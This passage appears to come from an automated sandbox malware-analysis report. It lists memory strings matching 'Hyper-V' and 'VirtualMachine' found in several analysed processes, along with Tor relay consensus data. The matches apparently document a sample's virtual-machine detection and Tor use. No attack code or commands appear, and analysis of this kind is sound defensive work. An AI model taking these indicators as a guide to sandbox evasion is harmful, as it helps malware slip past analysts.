Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-kmcl_31bf3856ad3
Source: csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmp, csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.17134.1_none_14929ba5ccea66b9\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.17134.1_none_6efae9ae437759d8\u)IX
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.17134.1_none_7338804b0eb50c17.manifest
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.17134.1_en-us_592a4468e416a24d.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catt\@
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-tpm.resources_31bf3856ad364e35_10.0.17134.1_en-us_259560ef1632af7b.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catst+
Source: csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vpmem_31bf3856ad364e35_10.0.17134.1_none_c277eb1734798565\amd64_microsoft-hyper-v-vstack-tpm_31bf3856ad364e35_10.0.17134.1_none_604b83348a0c5e92\amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.17134.1_none_c35bb6c84d5e4ad0\66b9amd64_microsoft-onecore-encdump_31bf3856ad364e35_10.0.17134.1_none_c9af4ac1de264540\7amd64_microsoft-onecore-cdp-winrt_31bf3856ad364e35_10.0.17134.1_none_492d582f5cbd45f0\amd64_microsoft-windows-bcrypt-dll_31bf3856ad364e35_10.0.17134.1_none_d40d1fc458900e79\amd64_microsoft-onecore-quiethours_31bf3856ad364e35_10.0.17134.1_none_8e6c6b9a9f19e7c7\amd64_microsoft-system-user-ext_31bf3856ad364e35_10.0.17134.1_none_60e18319883c0acb\amd64_microsoft-onecore-uiamanager_31bf3856ad364e35_10.0.17134.1_none_b5bc4f47f4347c9a\amd64_microsoft-windows-acledit_31bf3856ad364e35_10.0.17134.1_none_4d620c9fc5bc5c30\c9amd64_microsoft-hyper-v-vhd-parser_31bf3856ad364e35_10.0.17134.1_none_6447f639abdaab84\amd64_microsoft-onecore-sharehost_31bf3856ad364e35_10.0.17134.1_none_d2d7886a87bd
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-windows-hyper-v-dmvsc_31bf3856ad364e35_10.0.17134.1_none_8c46edec6c2bc4c5.manifest8
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catt
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumest
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum
Source: csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmp, csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.17134.1_none_6efae9ae437759d8\
Source: rad8AE2B.tmp, 00000006.00000002.9831021987.0000000000981000.00000004.sdmpBinary or memory string: \??\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..lebrowser.resources_31bf3856ad364e35_10.0.17134.1_en-us_73034f3cf79a1975\*
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.17134.1_none_b7d?
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-lun-parser_31bf3856ad364e35_10.0.17134.1_none_e6683e9b0956ac05\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-lun-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_15c27a1250ea6310\'
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.17134.1_none_602fae5e8a21fe6a.manifestgrXQV
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.17134.1_none_14929ba5ccea66b9\t
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumstts
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmsp.resources_31bf3856ad364e35_10.0.17134.1_en-us_96681ed56ec765c6\W
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.1_none_15d1dfb8ceafada1\_
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..ck-virtualizationv2_31bf3856ad364e35_10.0.17134.1_none_55327e6a748f524c\b
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-hypervcluster_31bf3856ad364e35_10.0.17134.1_none_d23c603739df2f63.manifestst
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..omputelib.resources_31bf3856ad364e35_10.0.17134.1_en-us_a1cfee3fcfcbe4d8\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-bpa.resources_31bf3856ad364e35_10.0.17134.1_en-us_461210c45e54cb44\
Source: rad8AE2B.tmp, 00000006.00000002.9881647891.0000000004068000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catc\,
Source: csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_hyperv-worker-events.resources_31bf3856ad364e35_10.0.17134.1_en-us_9de5622f209a7b21\2983amd64_microsoft-hyper-v-bpa.resources_31bf3856ad364e35_10.0.17134.1_en-us_461210c45e54cb44\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.1_none_15d1dfb8ceafada1\amd64_microsoft-antimalware-scan-interface_31bf3856ad364e35_10.0.17134.1_none_3c34e651403e5e41\amd64_ialpss2i_i2c_skl.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_980be98350adbd52\amd64_microsoft-analog-h2-fxpkg-baked_31bf3856ad364e35_10.0.17134.1_none_1be886b2910c8266\amd64_microsoft-analog-h2-hydrogenrt_31bf3856ad364e35_10.0.17134.165_none_d73dd06b14358015\amd64_microsoft-analog-h2-hydrogenrt_31bf3856ad364e35_10.0.17134.1_none_db29adc7273ced52\amd64_microsoft-composable-sharepicker_31bf3856ad364e35_10.0.17134.112_none_f4554668364f9786\amd64_microsoft-composable-sharepicker_31bf3856ad364e35_10.0.17134.1_none_f80e1506497cdc7d\amd64_microsoft-composable-start-binaries_31bf3856ad364e35_10.0.17134.1_none_6e6feff719ed9f5c\amd64_micros
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.17134.1_none_dacb8dcdbfa5382f.manifest\
Source: unverified-microdesc-consensus.tmp.6.drBinary or memory string: r VirtualMachineOrg 3hz5HBi0yPhCMh1mQ2wD0bZyqTs 2019-01-29 04:26:31 178.254.30.66 9001 9030
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.17134.1_none_7338804b0eb50c17\
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..ck-virtualizationv2_31bf3856ad364e35_10.0.17134.1_none_55327e6a748f524c.manifest
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.17134.1_none_27198deddb7b50eb.manifest
Source: csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmpBinary or memory string: amd64_hyperv-commandline-tool.resources_31bf3856ad364e35_10.0.17134.1_en-us_d5c4e754bc26201d\amd64_hyperv-compute-guestcomputeservice_31bf3856ad364e35_10.0.17134.1_none_7305852b7c12035c\amd64_hyperv-compute-guestcomputeservice_31bf3856ad364e35_10.0.17134.137_none_6f3c182768f074fa\amd64_microsoft-analog-h2-hydrogenrt_31bf3856ad364e35_10.0.17134.1_none_db29adc7273ced52\amd64_microsoft-hyper-v-3dvideo.resources_31bf3856ad364e35_10.0.17134.1_en-us_49c786157c795a73\amd64_microsoft-deviceproxy-wmiv2-provider_31bf3856ad364e35_10.0.17134.1_none_e9f22d8bf1fc7e92\amd64_microsoft-hyper-v-bpa.resources_31bf3856ad364e35_10.0.17134.1_en-us_461210c45e54cb44\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.1_none_15d1dfb8ceafada1\amd64_microsoft-analog-h2-animpkg-baked_31bf3856ad364e35_10.0.17134.1_none_6eba91e284242d6b\amd64_microsoft-appmodel-exec-events_31bf3856ad364e35_10.0.17134.1_none_07677813525018a6\amd64_microsoft-analog-h2-fxpkg-baked_31bf3856ad364e35_10.0.17134.1_none_1be886b2910c8266\amd64_mi
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..t-clients.resources_31bf3856ad364e35_10.0.17134.1_en-us_d370585015d204f5\q
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vpmem_31bf3856ad364e35_10.0.17134.1_none_c277eb1734798565.manifest36c\6q
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-firewallrules_31bf3856ad364e35_10.0.17134.1_none_b9673992b104448b.manifest\+
Source: rad8AE2B.tmp, 00000006.00000002.9830618547.0000000000951000.00000004.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-rdv_31bf3856ad364e35_10.0.17134.1_none_605452
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..oyment-languagepack_31bf3856ad364e35_10.0.17134.1_en-us_170afe8321651ef9.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.17134.1_en-us_2b9c39681a7206ff\p
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-computelib_31bf3856ad364e35_10.0.17134.1_none_9321c5b124bca3df.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum1.catd
Source: csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-rdv_31bf3856ad364e35_10.0.17134.1_none_6054528c8a07dd45\amd64_microsoft-onecore-sharehost_31bf3856ad364e35_10.0.17134.1_none_d2d7886a87bde445\amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.17134.1_none_602fae5e8a21fe6a\amd64_microsoft-onecore-quiethours_31bf3856ad364e35_10.0.17134.1_none_8e6c6b9a9f19e7c7\amd64_microsoft-system-user-ext_31bf3856ad364e35_10.0.17134.1_none_60e18319883c0acb\aamd64_microsoft-onecore-uiamanager_31bf3856ad364e35_10.0.17134.1_none_b5bc4f47f4347c9a\amd64_microsoft-windows-bcrypt-dll_31bf3856ad364e35_10.0.17134.1_none_d40d1fc458900e79\amd64_microsoft-windows-aadjcsp_31bf3856ad364e35_10.0.17134.1_none_600d1259ff3335b6\c9amd64_microsoft-windows-acledit_31bf3856ad364e35_10.0.17134.1_none_4d620c9fc5bc5c30\amd64_microsoft-hyper-v-vstack-tpm_31bf3856ad364e35_10.0.17134.1_none_604b83348a0c5e92\amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.17134.1_none_c35bb6c84d5e4ad0\66b9amd64_microsoft-onecore-cdp-winrt_31bf3856ad364e35_10.0.17134.1_none_492d582
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vpcivdev_31bf3856ad364e35_10.0.17134.1_none_7873076add237d80.manifestO
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-tpm_31bf3856ad364e35_10.0.17134.1_none_604b83348a0c5e92.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.17134.1_en-us_0d3e2a9bd4020545\5
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmsp_31bf3856ad364e35_10.0.17134.1_none_1ac175bdc8f2a
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-debug.resources_31bf3856ad364e35_10.0.17134.1_en-us_8e782c7a46f14b49.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-p..ru-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_d16dce7672841ddd\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.17134.1_none_602fae5e8a21fe6a\
Source: rad8AE2B.tmp, 00000006.00000002.9881647891.0000000004068000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumC\
Source: rad8AE2B.tmp, 00000006.00000002.9920332018.000000000437F000.00000004.sdmpBinary or memory string: ntor-onion-key F5ukBnjKXQqemuQUu9TOyC64OJps79HGsc5tb5fLdQE=
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.17134.48_none_cf157924edc24a05.manifest5sp
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-drivers-hypervisor-bcd_31bf3856ad364e35_10.0.17134.1_none_fb42759451b23f2f.manifest@jHAi-KXO
Source: rad8AE2B.tmp, 00000006.00000002.9869173109.0000000003DCA000.00000004.sdmpBinary or memory string: VirtualMachineOrg
Source: csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmp, csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.17134.1_none_1ac11a9dc8f30e5b\
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..apinabout.resources_31bf3856ad364e35_10.0.17134.1_en-us_02a473bf02f2a824\
Source: rad8AE2B.tmp, 00000006.00000002.9881647891.0000000004068000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat:
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..t-clients.resources_31bf3856ad364e35_10.0.17134.1_en-us_d370585015d204f5.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.17134.1_none_2457e84548829177\
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack_31bf3856ad364e35_10.0.17134.1_none_4a3dff595d47ce04.manifest
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..apinabout.resources_31bf3856ad364e35_10.0.17134.1_en-us_02a473bf02f2a824.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9881647891.0000000004068000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catf
Source: rad8AE2B.tmp, 00000006.00000002.9885370892.00000000040DD000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vhd-parser_31bf3856ad364e35_10.0.17134.1_none_6447f639abdaab84.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-ram-parser_31bf3856ad364e35_10.0.17134.1_none_d74ad2482ffdcb42\
Source: rad8AE2B.tmp, 00000006.00000002.9869173109.0000000003DCA000.00000004.sdmpBinary or memory string: O\VirtualMachineOrg
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-passthru-parser_31bf3856ad364e35_10.0.17134.1_none_076f3325872ef096\1D
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..lebrowser.resources_31bf3856ad364e35_10.0.17134.1_en-us_73034f3cf79a1975.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat?
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catE
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.17134.1_none_e99c08352e0bfafa\
Source: rad8AE2B.tmp, 00000006.00000002.9829836774.0000000000920000.00000004.sdmpBinary or memory string: \??\C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\**
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-h..-onecore-deployment_31bf3856ad364e35_10.0.17134.1_none_31bb998e7ce8dbdd.manifest
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-i..nents-rdv.resources_31bf3856ad364e35_10.0.17134.1_en-us_e3616de0d25a48c4.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..nthfcvdev.resources_31bf3856ad364e35_10.0.17134.1_en-us_9c3432f847f5f8f0\|
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-h..rvisor-host-service_31bf3856ad364e35_10.0.17134.1_none_51d671baba10f2e8.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catt
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catst
Source: wscript.exe, 00000001.00000002.8648989578.0000000002DAA000.00000004.sdmpBinary or memory string: Hyper-V RAW,
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..ommon-vm-deployment_31bf3856ad364e35_10.0.17134.1_none_f5e4ea96fd9fee6d.manifestjb&
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.17134.1_none_69e85823c476b806.manifest
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..oyment-languagepack_31bf3856ad364e35_10.0.17134.1_en-us_705250041d8b5452.manifest
Source: rad8AE2B.tmp, 00000006.00000002.9854447539.0000000003160000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.17134.1_en-us_f8bef40208ce4908\&
Source: csrss.exe, 00000007.00000002.8984127952.0000000000A12000.00000004.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mumt
Source: csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-lun-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_15c27a1250ea6310\amd64_microsoft-hyper-v-m..apinabout.resources_31bf3856ad364e35_10.0.17134.1_en-us_02a473bf02f2a824\amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.17134.1_en-us_592a4468e416a24d\amd64_microsoft-hyper-v-h..rvisor-host-service_31bf3856ad364e35_10.0.17134.1_none_51d671baba10f2e8\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.165_none_11e6025cbba84064\amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.17134.1_en-us_f27d2f48e22200a4\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.17134.1_none_27198deddb7b50eb\amd64_microsoft-hyper-v-m..t-clients.resources_31bf3856ad364e35_10.0.17134.1_en-us_d370585015d204f5\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.17134.1_none_69e85823c476b806\amd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.17134.1_en-us_0d3e2a9bd4020545\amd64_microsoft-hyper-v-m..lebrow
Source: rad8AE2B.tmp, 00000006.00000002.9875369752.0000000003F53000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum\9` YH
Source: csrss.exe, 0000000A.00000002.9040685495.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-onecore-bluetooth-proxy_31bf3856ad364e35_10.0.17134.1_none_d1d1581b008d2447\amd64_microsoft-management-assignedaccess_31bf3856ad364e35_10.0.17134.1_none_76c8fcda01b3aee0\amd64_microsoft-onecore-console-host-core_31bf3856ad364e35_10.0.17134.1_none_5316cfc78d5f777e\amd64_microsoft-onecore-bluetooth-userapis_31bf3856ad364e35_10.0.17134.1_none_5135b094293fbb0b\amd64_microsoft-onecore-bluetooth-service_31bf3856ad364e35_10.0.17134.1_none_d1cde1fc2644ba6c\amd64_microsoft-onecore-assignedaccess-csp_31bf3856ad364e35_10.0.17134.1_none_37310745ce695f93\amd64_microsoft-onecore-coremessaging_31bf3856ad364e35_10.0.17134.165_none_2917828339aae782\amd64_microsoft-hyper-v-vstack-vpcivdev_31bf3856ad364e35_10.0.17134.1_none_7873076add237d80\amd64_microsoft-onecore-coremessaging_31bf3856ad364e35_10.0.17134.1_none_2d035fdf4cb254bf\amd64_microsoft-onecore-dolbyhrtfenc_31bf3856ad364e35_10.0.17134.81_none_1075f27dea970af0\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.17134.48_none_28a3bf323de300ba\amd64_mi
Source: rad8AE2B.tmp, 00000006.00000002.9942157178.0000000004960000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catest^
Source: rad8AE2B.tmp, 00000006.00000003.9330993090.0000000003EF7000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.165_none_11e6025cbba84064.manifestt
Source: csrss.exe, 00000007.00000002.8986663720.0000000002712000.00000004.sdmpBinary or memory string: amd64_microsoft-management-assignedaccess_31bf3856ad364e35_10.0.17134.1_none_76c8fcda01b3aee0\amd64_microsoft-onecore-bluetooth-bthserv_31bf3856ad364e35_10.0.17134.1_none_9e5c1f54d20f8511\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.17134.112_none_17084bffb5c5c964\amd64_microsoft-windows-ad-propertypages_31bf3856ad364e35_10.0.17134.1_none_d37a0ec2b596cdaf\eamd64_microsoft-onecore-assignedaccess-csp_31bf3856ad364e35_10.0.17134.1_none_37310745ce695f93\amd64_microsoft-onecore-bluetooth-proxy_31bf3856ad364e35_10.0.17134.1_none_d1d1581b008d2447\amd64_microsoft-onecore-coremessaging_31bf3856ad364e35_10.0.17134.1_none_2d035fdf4cb254bf\b0bamd64_microsoft-onecore-dolbyhrtfenc_31bf3856ad364e35_10.0.17134.1_none_fc1917e579d73fea\amd64_microsoft-onecore-dolbyhrtfenc_31bf3856ad364e35_10.0.17134.81_none_1075f27dea970af0\amd64_microsoft-onecore-bluetooth-userapis_31bf3856ad364e35_10.0.17134.1_none_5135b094293fbb0b\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.17134.48_none_28a3bf323de300ba\amd64_micr
Source: rad8AE2B.tmp, 00000006.00000002.9869833108.0000000003E4E000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-passthru-parser_31bf3856ad364e35_10.0.17134.1_none_076f3325872ef096.manifest3\
